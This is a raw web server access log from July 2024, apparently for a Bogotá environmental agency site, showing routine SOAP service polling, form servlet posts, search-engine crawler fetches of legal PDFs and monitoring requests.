201.245.192.253 - - [03/Jul/2024:05:26:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:26:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37538
201.245.192.253 - - [03/Jul/2024:05:26:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33472
66.249.66.37 - - [03/Jul/2024:05:26:59 -0500] "GET /cierre-temporal-de-la-sede-principal-de-la-secretaria-de-ambiente-para-atencion-al-publico.html HTTP/1.1" 200 986
201.245.192.253 - - [03/Jul/2024:05:27:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [03/Jul/2024:05:28:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8108.pdf HTTP/1.1" 200 490293
172.22.2.4 - - [03/Jul/2024:05:28:07 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:05:28:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:28:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:29:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
201.245.192.253 - - [03/Jul/2024:05:29:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39626
66.249.66.13 - - [03/Jul/2024:05:29:06 -0500] "GET /Publicaciones/2024EE55559.pdf HTTP/1.1" 404 227
66.249.66.13 - - [03/Jul/2024:05:29:06 -0500] "GET /Publicaciones/2024EE96616.pdf HTTP/1.1" 404 227
66.249.66.11 - - [03/Jul/2024:05:29:06 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/isolucionsda/BancoConocimiento/L/Ley1382deFebrero9de2010/Ley1382deFebrero9de2010.asp?IdArticulo=2166 HTTP/1.1" 200 527
216.245.221.92 - - [03/Jul/2024:05:29:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:05:27:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:29:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:29:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33472
201.245.192.253 - - [03/Jul/2024:05:30:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:05:28:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51133
201.245.192.253 - - [03/Jul/2024:05:30:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.133.77.15 - - [03/Jul/2024:05:31:27 -0500] "GET /images/cr%C3%B3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [03/Jul/2024:05:31:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:30:07 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61093
66.249.66.14 - - [03/Jul/2024:05:32:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201851-1900/00001888.tif HTTP/1.1" 200 100624
201.245.192.253 - - [03/Jul/2024:05:32:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:32:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:33:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:34:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
201.245.192.253 - - [03/Jul/2024:05:34:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [03/Jul/2024:05:34:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:34:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
168.119.253.69 - - [03/Jul/2024:05:35:04 -0500] "GET / HTTP/1.1" 200 4720
23.22.35.162 - - [03/Jul/2024:05:35:07 -0500] "GET /moda-circular-manos-reparadoras-la-estrategia-del-distrito-para-restaurar-prendas-usadas.html HTTP/1.1" 200 901
23.22.35.162 - - [03/Jul/2024:05:35:11 -0500] "GET /images/secretaria-de-ambiente-carolina-urrutia-manos-reparadoras.jpg HTTP/1.1" 200 46600
172.22.2.4 - - [03/Jul/2024:05:33:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:35:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:36:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
45.156.128.39 - - [03/Jul/2024:05:36:11 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Jul/2024:05:34:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49794
201.245.192.253 - - [03/Jul/2024:05:36:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [03/Jul/2024:05:37:06 -0500] "GET /BLA/resoluciones/AUTOS%202018/2825.pdf HTTP/1.1" 200 283771
201.245.192.253 - - [03/Jul/2024:05:37:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:35:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [03/Jul/2024:05:36:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [03/Jul/2024:05:37:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33472
172.22.2.4 - - [03/Jul/2024:05:38:05 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:05:38:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:38:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:39:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
201.245.192.253 - - [03/Jul/2024:05:39:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39634
172.22.2.4 - - [03/Jul/2024:05:37:38 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 61913
216.245.221.92 - - [03/Jul/2024:05:39:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:39:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:39:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33472
201.245.192.253 - - [03/Jul/2024:05:40:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:40:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:40:38 -0500] "GET /BLA/boletinlegal/WuEL HTTP/1.1" 404 1018
172.22.2.4 - - [03/Jul/2024:05:40:42 -0500] "GET /BLA/boletinlegal/a HTTP/1.1" 404 1018
172.22.2.4 - - [03/Jul/2024:05:40:45 -0500] "GET /BLA/boletinlegal/download/file.ext HTTP/1.1" 404 1018
172.22.2.4 - - [03/Jul/2024:05:40:47 -0500] "GET /BLA/boletinlegal/SiteLoader HTTP/1.1" 404 1018
172.22.2.4 - - [03/Jul/2024:05:40:49 -0500] "GET /BLA/boletinlegal/mPlayer HTTP/1.1" 404 1018
216.244.66.195 - - [03/Jul/2024:05:41:00 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [03/Jul/2024:05:39:21 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 54913
172.22.2.4 - - [03/Jul/2024:05:39:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:41:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:40:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
201.245.192.253 - - [03/Jul/2024:05:42:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
